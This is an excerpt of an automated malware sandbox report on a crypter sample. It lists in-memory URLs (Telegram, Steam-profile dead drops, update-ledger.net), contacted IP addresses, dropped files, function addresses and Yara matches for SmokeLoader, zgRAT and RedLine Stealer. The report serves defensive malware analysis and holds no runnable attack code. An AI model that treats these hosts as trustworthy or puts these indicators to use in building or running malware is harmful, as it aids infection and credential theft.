                        Source: RegAsm.exe, 00000003.00000002.1830248913.000000000148D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.
                        Source: RegAsm.exe, 00000003.00000002.1830248913.000000000148D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
                        Source: XO9lsdL5g6aUibu31TDcoBrI.exe, 0000000F.00000000.1788981132.0000000000E22000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: https://sso2urn:ietf:wg:oauth:2.0:oob
                        Source: Yt_9y5LuIpBZXKd9EiYluKkG.exe, 00000006.00000002.2087266509.00000000034F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
                        Source: Yt_9y5LuIpBZXKd9EiYluKkG.exe, 00000006.00000002.2087266509.00000000034F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0
                        Source: Yt_9y5LuIpBZXKd9EiYluKkG.exe, 00000006.00000002.2087266509.00000000034F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/ae5ed
                        Source: kFXFCWzZNovbPAcE4V3M4DAO.exe, kFXFCWzZNovbPAcE4V3M4DAO.exe, 00000008.00000000.1791830844.0000000000887000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: https://update-ledger.net/update
                        Source: kJHbagG0C4H5BEyYJQeInLfF.exe, 0000000C.00000002.2392516588.00000000026D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                        Source: XO9lsdL5g6aUibu31TDcoBrI.exe, 0000000F.00000000.1788981132.0000000000E22000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                        Source: XO9lsdL5g6aUibu31TDcoBrI.exe, 0000000F.00000000.1788981132.0000000000E22000.00000002.00000001.01000000.00000012.sdmpString found in binary or memory: https://www.nuget.org/packages/Microsoft.Identity.Json.Bson
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                        Source: unknownHTTPS traffic detected: 104.237.62.213:443 -> 192.168.2.9:49706 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.9:49707 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.9:49723 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 162.241.61.218:443 -> 192.168.2.9:49727 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 162.241.61.218:443 -> 192.168.2.9:49726 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 52.217.131.81:443 -> 192.168.2.9:49728 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.26.2.46:443 -> 192.168.2.9:49739 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 162.241.61.218:443 -> 192.168.2.9:49754 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.9:49758 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 116.203.165.127:443 -> 192.168.2.9:49761 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 116.203.165.127:443 -> 192.168.2.9:49798 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Yara detected SmokeLoader
                        Source: Yara matchFile source: 0000002B.00000002.2943867641.0000000002A61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.2601636491.0000000002600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.2601573090.0000000002561000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: 11.2.g2v2mVtOHdxh9ZgrtYde5yf0.exe.3f55570.0.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Source: 11.2.g2v2mVtOHdxh9ZgrtYde5yf0.exe.3f55570.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Source: 33.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Source: 0000002B.00000002.2943867641.0000000002A61000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                        Source: 00000009.00000002.2601636491.0000000002600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                        Source: 00000009.00000002.2601921421.000000000283E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                        Source: 00000009.00000002.2601604235.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                        Source: 00000009.00000002.2601573090.0000000002561000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                        Drops large PE files
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeFile dump: service123.exe.8.dr 314613760Jump to dropped file
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeFile dump: ClientSecureUpdater.exe.12.dr 976632104Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042CD50 __aulldiv,VirtualAlloc,__aulldiv,__aulldiv,NtQuerySystemInformation,__aulldiv,WideCharToMultiByte,CharToOemA,VirtualFree,__aulldiv,3_2_0042CD50
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeCode function: 9_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_00401514
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeCode function: 9_2_00402F97 VirtualProtect,RtlCreateUserThread,NtTerminateProcess,9_2_00402F97
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeCode function: 9_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_00401542
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeCode function: 9_2_00403247 NtTerminateProcess,RtlInitUnicodeString,9_2_00403247
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeCode function: 9_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_00401549
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeCode function: 9_2_0040324F NtTerminateProcess,RtlInitUnicodeString,9_2_0040324F
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeCode function: 9_2_00403256 NtTerminateProcess,RtlInitUnicodeString,9_2_00403256
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeCode function: 9_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_00401557
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeCode function: 9_2_0040326C NtTerminateProcess,RtlInitUnicodeString,9_2_0040326C
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeCode function: 9_2_00403277 NtTerminateProcess,9_2_00403277
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeCode function: 9_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,9_2_004014FE
                        Source: C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exeCode function: 9_2_00403290 NtTerminateProcess,RtlInitUnicodeString,9_2_00403290
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0041B16F NtQueryDefaultLocale,ExitProcess,12_2_0041B16F
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_004199E9 NtQueryDefaultLocale,12_2_004199E9
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0041B347 NtQueryDefaultLocale,ExitProcess,12_2_0041B347
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00419354 NtQueryDefaultLocale,12_2_00419354
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00419389 NtQueryDefaultLocale,12_2_00419389
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0041B41F NtQueryDefaultLocale,ExitProcess,12_2_0041B41F
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0041A66B NtQueryDefaultLocale,ExitProcess,12_2_0041A66B
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0041A60F NtQueryDefaultLocale,ExitProcess,12_2_0041A60F
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00419739 NtQueryDefaultLocale,12_2_00419739
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0041A854 NtQueryDefaultLocale,ExitProcess,12_2_0041A854
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0041A897 NtQueryDefaultLocale,ExitProcess,12_2_0041A897
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0041A93C NtQueryDefaultLocale,ExitProcess,12_2_0041A93C
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00419ABE NtQueryDefaultLocale,12_2_00419ABE
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00418CB1 NtQueryDefaultLocale,12_2_00418CB1
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00419DF2 NtQueryDefaultLocale,12_2_00419DF2
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0041AD8D NtQueryDefaultLocale,ExitProcess,12_2_0041AD8D
                        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeCode function: 0_2_02F55DF10_2_02F55DF1
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeCode function: 0_2_014008480_2_01400848
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeCode function: 0_2_014030C00_2_014030C0
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeCode function: 0_2_014022400_2_01402240
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeCode function: 0_2_014066300_2_01406630
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeCode function: 0_2_01405EFA0_2_01405EFA
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeCode function: 0_2_014008390_2_01400839
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeCode function: 0_2_0140C56C0_2_0140C56C
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeCode function: 0_2_01408F4F0_2_01408F4F
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeCode function: 0_2_01408F600_2_01408F60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004272103_2_00427210
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004815803_2_00481580
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042C6703_2_0042C670
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004366C03_2_004366C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0046D6E03_2_0046D6E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004307403_2_00430740
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004517203_2_00451720
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004317E03_2_004317E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004429703_2_00442970
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0047EB603_2_0047EB60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00437B103_2_00437B10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00434B203_2_00434B20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00509BD03_2_00509BD0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00433BE03_2_00433BE0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00434D403_2_00434D40
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004CEF103_2_004CEF10
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00440F203_2_00440F20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004210E03_2_004210E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004021003_2_00402100
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004242B03_2_004242B0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004213A03_2_004213A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004234703_2_00423470
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004414803_2_00441480
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042D5703_2_0042D570
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_005175153_2_00517515
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040B5E03_2_0040B5E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0056359F3_2_0056359F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0054E59A3_2_0054E59A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004056403_2_00405640
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004226403_2_00422640
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042A6603_2_0042A660
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004026303_2_00402630
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_005446D93_2_005446D9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004437503_2_00443750
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_005177103_2_00517710
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_005137203_2_00513720
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004247303_2_00424730
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004218203_2_00421820
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041E9E03_2_0041E9E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_005629833_2_00562983
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0044ABA03_2_0044ABA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00425CA03_2_00425CA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042CD503_2_0042CD50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00550D683_2_00550D68
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042DD203_2_0042DD20
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00543D303_2_00543D30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00552DA03_2_00552DA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00567E9D3_2_00567E9D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00401E903_2_00401E90
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeCode function: 8_1_004144C98_1_004144C9
                        Source: C:\Users\user\Documents\iofolko5\kFXFCWzZNovbPAcE4V3M4DAO.exeCode function: 8_1_0040779F8_1_0040779F
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeCode function: 10_2_00D918F910_2_00D918F9
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeCode function: 10_2_00D9190810_2_00D91908
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeCode function: 10_2_00D9169810_2_00D91698
                        Source: C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exeCode function: 10_2_00D9168810_2_00D91688
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0041B16F12_2_0041B16F
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_004199E912_2_004199E9
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_00416B2C12_2_00416B2C
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040A04B12_2_0040A04B
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040900912_2_00409009
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040903712_2_00409037
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040A0D012_2_0040A0D0
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_004090E612_2_004090E6
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_004090EF12_2_004090EF
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040D08512_2_0040D085
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040A0BB12_2_0040A0BB
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040A16812_2_0040A168
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040917212_2_00409172
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040910912_2_00409109
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040A11F12_2_0040A11F
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_004071CC12_2_004071CC
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_004171DD12_2_004171DD
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_004061F212_2_004061F2
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_004071A512_2_004071A5
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040A24A12_2_0040A24A
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040925412_2_00409254
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040825A12_2_0040825A
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040920112_2_00409201
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040622612_2_00406226
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040A23D12_2_0040A23D
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_004062D812_2_004062D8
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040A29612_2_0040A296
                        Source: C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exeCode function: 12_2_0040829912_2_00408299
